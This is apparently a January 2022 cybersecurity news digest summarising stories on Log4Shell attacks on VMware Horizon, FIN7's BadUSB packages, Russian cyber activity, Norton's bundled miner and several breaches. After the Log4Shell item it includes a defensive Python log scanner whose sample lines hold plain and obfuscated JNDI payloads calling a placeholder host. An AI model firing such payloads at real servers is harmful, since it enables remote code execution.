Saturday, January 8, 2022
China's plans for a national cybersecurity barrier. A US Federal role in the open-source software supply chain? A look at proposed reporting deadlines.
FROM THE MEDIA: China’s cyberspace regulator says it plans to establish a comprehensive internet governance system and construct a solid national cyber security barrier, Reuters reports. The statement added that China “will win the battle for core technologies in the information field” and emphasized the regulator’s goal of bolstering mainstream online opinion. The recently discovered Log4j vulnerability has drawn attention to the need to bolster the security of open-source software, and Politico posits that it’s time for the federal government to step in to support the open-source development community. Because most open-source software is developed by tech employees whose companies’ products rely on the code, the developer community is disconnected and not properly focused on security. The past year has seen some improvement efforts; the Linux Foundation’s Open Source Security Foundation drafted a vulnerability disclosure guide for developers, supplied guidance for building security protections into the code, and even created a security certificate for updates. And Google has promised to donate $100 million to open-source security. However, experts feel that government support is essential. Brian Behlendorf, the Open Source Security Foundation’s general manager, said federal grants as low as $50,000 could be enough to support a team devoted to open-source security. Consistent developer use of a software bill of materials (SBOM), a content list that details the provenance of the code, could help users detect vulnerable code, but few developers have the technology to maintain an accurate SBOM.
Allan Friedman, a senior adviser and strategist at the US Cybersecurity and Infrastructure Security Agency who previously oversaw SBOM work at the National Telecommunications and Information Administration, explains, “Transparency in the software supply chain is going to be critical…to understand where our exposures are, where our risks are and where the opportunities to help are.” It’s worth noting that proposals for Federal involvement envision resources more than they do direction or regulation.
READ THE STORY: The Cyber Wire
ANALYST COMMENT: NSTR
Russian cyberattacks in Ukraine soar as invasion fears grow, security experts warn
FROM THE MEDIA: Cybersecurity experts are warning that a recent surge in Russian cyber attacks on Ukraine could be a prelude to an invasion. The latest ISMG Security Report suggests the increase in Russian cyber interference in Ukrainian networks could be a warning that eastern Ukraine will face a physical attack. Cyber experts have expressed concerns about an apparent surge in Russian cyber attacks on Ukraine. Russia has already moved 175,000 soldiers to its border with Ukraine. The intentions of Russian President Vladimir Putin currently remain unclear, but he has heavily criticized Ukraine's plans to join NATO. Cyber experts warned before Christmas that Russia had been advancing online disinformation to undermine Ukraine's president. ISMG's Mathew Schwartz said in the latest ISMG podcast that there has been an increase in Russian cyber operations in Ukraine since the beginning of December. Key government and civilian Ukrainian networks are said to have been targeted, including those belonging to Ukrainian banking and infrastructure firms.
READ THE STORY: The Sun
ANALYST COMMENT: NSTR
The Federal Bureau of Investigation (FBI) warns US companies that the FIN7 cybercriminals group is targeting the US defense industry with BadUSB devices
FROM THE MEDIA: The US Federal Bureau of Investigation issued a flash alert to warn that the financially motivated group FIN7 has sent malicious USB devices, known as BadUSB devices, to US companies over the past few months to infect their systems with malware. The gang is using weaponized USB devices bearing the LilyGO logo, which are sent to the victims via the United States Postal Service and United Parcel Service. FIN7 has used this technique to target businesses in the transportation and insurance industries since August 2021, and began targeting defense firms in November 2021. The operators impersonate Amazon and the US Department of Health & Human Services (HHS) to trick the victims into opening the packages and plugging the BadUSB devices into their systems. According to the alert, threat actors employed packages containing letters about COVID-19 guidelines or counterfeit gift cards and forged thank-you notes. “Since August 2021, the FBI has received reports of several packages containing these USB devices, sent to US businesses in the transportation, insurance, and defense industries,” reads the flash alert issued by the FBI, which was viewed by The Record. “The packages were sent using the United States Postal Service and United Parcel Service,” continues the alert. “There are two variations of packages—those imitating HHS [US Department of Health and Human Services] are often accompanied by letters referencing COVID-19 guidelines enclosed with a USB; and those imitating Amazon arrived in a decorative gift box containing a fraudulent thank you letter, counterfeit gift card, and a USB.” Once a USB thumb drive is plugged into a computer, a BadUSB attack is triggered: the device registers as a keyboard (HID emulator USB) and sends keystrokes to the system. In the attacks analyzed by the FBI, those keystrokes ran PowerShell commands to download and install malicious payloads, including BlackMatter and REvil ransomware.
The FIN7 group used a broad range of tools and malware such as Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER, and TIRION.
READ THE STORY: Security Affairs
ANALYST COMMENT: NSTR
NHS Warns of Hackers Targeting Log4j Flaws in VMware Horizon
FROM THE MEDIA: The digital security team at the U.K. National Health Service (NHS) has raised the alarm on active exploitation of Log4Shell vulnerabilities in unpatched VMware Horizon servers by an unknown threat actor to drop malicious web shells and establish persistence on affected networks for follow-on attacks. "The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure," the non-departmental public body said in an alert. "Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service." The web shell, once deployed, can serve as a conduit for a multitude of post-exploitation activities such as deploying additional malicious software, exfiltrating data, or deploying ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to the Log4j vulnerabilities.
READ THE STORY: THN
ANALYST COMMENT: NSTR
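As an added illustration for the Log4Shell item above (example code written for this digest, not from the NHS alert or THN), the following Python collapses the nested lookup tricks attackers use to hide the `${jndi:...}` string in request fields and flags log lines that carry a JNDI lookup, which is the first, reconnaissance, step the NHS alert describes. The sample log lines and the `probe.example` hostname are constructed; the resolver handles only the `lower`, `upper` and `:-default` lookups, which cover the common obfuscation forms.

```python
import re

# Constructed sample access-log lines (not real traffic): one plain Log4Shell
# probe, two obfuscated variants, and one benign request.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://probe.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://probe.example/b}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://probe.example/c}"',
    '10.0.0.8 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
]

# An innermost ${...} lookup: its body holds no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A fully resolved JNDI lookup, capturing the scheme and the target that
# Log4j would hand to JNDI (ldap, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:([a-z]+)://([^}\s]+)\}", re.IGNORECASE)


def _resolve_inner(match):
    """Evaluate one innermost lookup the way Log4j's substitutor does for the
    lookups attackers lean on to hide the literal word 'jndi'."""
    body = match.group(1)
    # ${name:-default}: ':-' separates the lookup from its fallback value.
    name, has_default, default = body.partition(":-")
    prefix, _, arg = name.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "jndi":
        return match.group(0)      # keep: this is the lookup we hunt for
    if has_default:
        return default             # unknown lookup (env, sys, ':' ...) -> fallback
    return match.group(0)          # unresolvable and no fallback: leave literal


def normalize_lookups(text, max_rounds=10):
    """Evaluate innermost lookups repeatedly until the text stops changing,
    so nested obfuscation collapses to the plain ${jndi:...} form."""
    for _ in range(max_rounds):
        new_text = INNER_LOOKUP.sub(_resolve_inner, text)
        if new_text == text:
            break
        text = new_text
    return text


def find_jndi_lookups(text):
    """Return (scheme, target) pairs for each JNDI lookup after normalization."""
    normalized = normalize_lookups(text)
    return [(m.group(1).lower(), m.group(2)) for m in JNDI_LOOKUP.finditer(normalized)]


def scan_log(lines):
    """Flag every log line that carries a JNDI lookup; one dict per finding."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        for scheme, target in find_jndi_lookups(line):
            hits.append({"line_no": line_no, "scheme": scheme, "target": target})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: JNDI over {hit['scheme']} -> {hit['target']}")
```

Run it over web, Horizon gateway or proxy logs; a hit on a server that is still on a vulnerable Log4j version is a reason to look for the web shell stage described in the alert, not just to block the source.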
The anti-virus giant Norton is being criticized for automatically installing a crypto miner on its users’ devices that mines Ethereum
FROM THE MEDIA: Norton 360 is popular antivirus software. However, it has come under fire because it is installing a cryptocurrency mining program on users’ devices. According to reports, the cryptocurrency miner was included in the Norton antivirus in June last year to help Norton 360 users earn some extra money from their graphics card. The tool is called Norton Crypto, and it mines Ethereum. Users keep 85% of the proceeds while the remainder goes to NortonLifeLock. According to Norton, the parent firm behind Norton 360, the cloud-based services responsible for activating the antivirus program have offered users an option to profit from the scheme, but users still have to agree to enable it. However, many users have complained that the mining tool embedded in the antivirus software is hard to delete and causes problems on the device. A Twitter user first posted about the issue, claiming that the Norton 360 program had installed the mining tool on his computer through a program called NCrypt.exe that cannot be uninstalled.
READ THE STORY: HackRead
ANALYST COMMENT: NSTR
Cyber Command announces partnership with 84 universities
FROM THE MEDIA: U.S. Cyber Command announced it will partner with 84 universities across 34 states this year as part of a program to build up the nation’s cybersecurity workforce and familiarize students with military cyber programs. The partnership, part of the agency’s Academic Engagement Network, will give students at the participating universities access to guest lecturers from U.S. CyberCom officials, non-public webinars about “pressing technical problems and non-technical problems” in cyberspace and other communications about changes in the cyber domain from the military agency. According to an announcement, U.S. Cyber Command Executive Director David Frederick held a virtual meeting with representatives from the schools on Thursday to provide details on specific programs and plans that will be offered over the next nine months. The engagements will be structured around four lines of effort that will “serve as an investment in creating a robust and accessible pool of qualified cyber professionals,” including future workforce issues, applied cyber research, applied analytics and strategic issues. “Cyber Command’s goal for the AEN is to strengthen our relationships and communication with these participating institutions,” Frederick said in a statement. “This will improve and sustain our efforts to meet cyberspace educational requirements and workforce needs.” The participating universities were not named; SC Media has contacted U.S. Cyber Command’s media office for a full list of the partners, and is awaiting a response. Of the 84 partners, CyberCom said 69 are universities, 13 are community colleges, nine are minority serving institutions and four are military war and staff colleges.
To be eligible for a partnership, schools must offer accredited two-year, four-year or post-graduate degree programs around cybersecurity and offer specialization or courses in computer science, cyber related engineering, cyber law, intelligence, applied analytics and other subjects with a nexus to cybersecurity. Cyber Command officials plan to offer additional details on the program and partnerships in a follow-on briefing in the near future.
READ THE STORY: SC Magazine
ANALYST COMMENT: NSTR
Russian submarines threatening undersea network of internet cables, says UK defense chief Sir Tony Radakin
FROM THE MEDIA: The head of Britain's armed forces is warning that Russian submarines are threatening a crucial network of underwater cables that carry information around the world. Admiral Sir Tony Radakin, who was appointed chief of the defence staff in October, told The Times newspaper that the undersea cables that transmit internet data are "the world's real information system". Any attempt to damage them could be considered an "act of war", he added. Sir Tony, a former head of the Royal Navy, said in his first interview since taking up the role that there had been a "phenomenal increase in Russian submarine and underwater activity" in the last 20 years. It meant Moscow could "put at risk and potentially exploit the world's real information system, which is undersea cables that go all around the world". "That is where predominantly all the world's information and traffic travels," he added. "Russia has grown the capability to put at threat those undersea cables and potentially exploit those undersea cables." The Royal Navy has been tracking Russian submarine activity during that period. A collision between a British Type 23 frigate, HMS Northumberland, and a Russian sub has sparked wider speculation about the extent of Russian cable-mapping activity. The collision, filmed in newly released footage by a documentary crew from Channel 5 working on a television series called Warship: Life At Sea, occurred in December 2020. Sir Tony also said in his interview that the UK should develop hypersonic missiles to keep up with other nations doing the same.
READ THE STORY: Sky News
ANALYST COMMENT: NSTR
Norwegian Media Company Amedia Suffered a Serious Cyber Attack That Left Newspapers Unprinted
FROM THE MEDIA: Norwegian media company Amedia suffered a cyber attack that shut down its computer systems, preventing the company from printing newspapers. According to the company, the incident also affected its advertising and subscription systems, preventing advertisers from ordering new ads and subscribers from enrolling or canceling their subscriptions. Amedia Executive Vice President of Technology Pål Nedregotten said the incident forced it to shut down systems administered by Amedia Teknologi. Nedregotten acknowledged that they were still analyzing the incident with the aim of limiting the potential damage. Although online newspapers were still available, it was unclear when the company would resume circulating printed newspapers. Amedia owns over 90 publications, the Avisenes Nyhetsbyrå media outlet, and Prime Print publishing in Russia. With a domestic readership of about 2.5 million, Amedia is one of the most popular media companies in the region. The attack may also have leaked personal information. The media company was still analyzing the nature and scope of the cyber attack, and had yet to determine whether the incident was a ransomware attack. According to the company’s statement posted on its website, Amedia could not rule out that subscriber and employee personal information had been compromised. Personal data stored on the compromised system and potentially exposed include customers’ names, addresses, phone numbers, and subscription history.
READ THE STORY: CPO Magazine
ANALYST COMMENT: NSTR
TSA Mandates Immediate Cyber Preparations for Rail Owners and Operators following its Imposition of Similar Requirements on Airports and Airlines
FROM THE MEDIA: On December 2, 2021, the Transportation Security Administration (TSA), within the Department of Homeland Security (DHS), announced two new Directives (the Directives) mandating cybersecurity measures for critical surface transportation systems. The Directives’ requirements cover owners and operators of high-risk freight railroads, passenger rail and transit. TSA also issued an information circular calling for low-risk rail owners and operators and over-the-road bus owners and operators (those not covered by the first two Directives) to voluntarily adopt the same cybersecurity measures. These Directives follow the TSA’s recent updates to its aviation security programs to require that airport and airline operators implement the first two provisions above. They also represent the TSA’s second round of cybersecurity directives in 2021, arriving after the two pipeline requirement announcements in May and July. The TSA immediately implemented these new requirements, which took effect on December 31. For high-risk freight rail, passenger rail, and rail transit operators, the first Directive, Enhancing Public Transportation and Passenger Railroad Cybersecurity, covers owners and operators of passenger railroad or rail-transit systems identified in 49 C.F.R. § 1582.101, while the second Directive, Enhancing Rail Cybersecurity, applies to freight railroads identified in 49 C.F.R. § 1580.101. According to the press release, these represent “higher-risk” freight railroads, passenger rail and rail transit. The Information Circular, Enhancing Surface Transportation Cybersecurity (the voluntary Directive), recommends but does not require that those owners and operators not covered by the first two Directives implement the same cybersecurity measures. These “lower-risk” transport systems include railroad owners and operators identified in 49 C.F.R. § 1580.1(a), passenger railroads, public transport agencies or rail transit system owners and operators identified in 49 C.F.R. § 1582.1, and over-the-road bus owners and operators identified in 49 C.F.R. § 1584.1. A “cybersecurity incident” under the Directives includes any event that “jeopardizes, disrupts or otherwise impacts the integrity, confidentiality, or availability of computers, information or communications systems or networks,” including any physical and virtual infrastructure those systems control or information resident on the system, as well as events under investigation as incidents.
READ THE STORY: JD Supra
ANALYST COMMENT: NSTR
3.7M FlexBooker Records Dumped on Hacker Forum
FROM THE MEDIA: Attackers are trading millions of records from a trio of pre-holiday breaches on an online forum. A threat group that identifies itself as Uawrongteam is dumping data stolen from FlexBooker – a popular online appointment scheduling tool for booking services ranging from counseling to haircuts – on a cybercriminal forum. The data from FlexBooker is being offered up by Uawrongteam, along with other databases stolen on the same day, Dec. 23, from Racing.com and Redbourne Group’s rediCASE case management software, BleepingComputer reported. FlexBooker sent a notification to its users, explaining that its Amazon AWS servers were compromised by what the company was able to identify as a distributed denial-of-service (DDoS) attack. FlexBooker customers include the brands GoDaddy, Chipotle, Bausch + Lomb and Krewe. “After working further with Amazon to understand what happened, we learned a certain set of data, including personal information of some customers, was accessed and downloaded,” the company said. Uawrongteam claimed that its stolen database contains 10 million lines, including payment details. FlexBooker said in its disclosure that it considers the matter resolved and is “… still monitoring for any lingering issues.” But the attack might not be over, warned Nasser Fattah with Shared Assessments. “We know that there are financial losses associated with system outages, hence, why security teams have all eyes on glass, so to speak, when there is a DDoS attack,” Fattah explained to Threatpost on Friday. “And when this happens, it is important to be prepared for the possibility of a multifaceted attack and be very diligent with monitoring other anomalies happening on the network.”
READ THE STORY: Threat Post
ANALYST COMMENT: NSTR
Paper of interest
Launching an Open Source Flight Database for Kazakhstan in Wake of Protests
FROM THE MEDIA: As the crisis in Kazakhstan has unfolded over recent days, open source researchers have again turned to social media and other online resources to make sense of events from afar. As Bellingcat has previously noted, flight tracking websites are a key part of this digital toolkit. The ability to follow, in real time, the movements of high-profile individuals, cargo flights, or even the transport of soldiers to and from a conflict zone can provide crucial insight into a developing situation. For example, in Kazakhstan rumours have spread about the whereabouts of former President Nursultan Nazarbayev, with local media alleging that he has left the country with his two daughters. For now, claims such as these remain mere speculation, which is why a detailed database of flights may be a first step to assessing them. Joanna Lillis, a Kazakhstan-based journalist and author of a recent book about the country’s politics, told Bellingcat in an interview that “it wouldn’t be surprising if some members of the elite have left the country or were trying to urgently flee. They can see an angry mood among protesters and are worried about their fates if somehow protesters get hold of them”. Military planes from neighboring Russia have also headed towards Kazakhstan in recent days as part of an agreement struck by the regional Collective Security Treaty Organization to help regain order, something which can again be monitored and tracked by flight monitoring platforms.
Bellingcat has thus launched an open source database of noteworthy flights to and from the country’s airports in a bid to better understand the recent and evolving dynamics in Kazakhstan. The database, whose entries start on January 3, is open to use and continued to be updated at the time of publication.
READ THE STORY: Bellingcat
ANALYST COMMENT: NSTR
About this Product
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends in the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com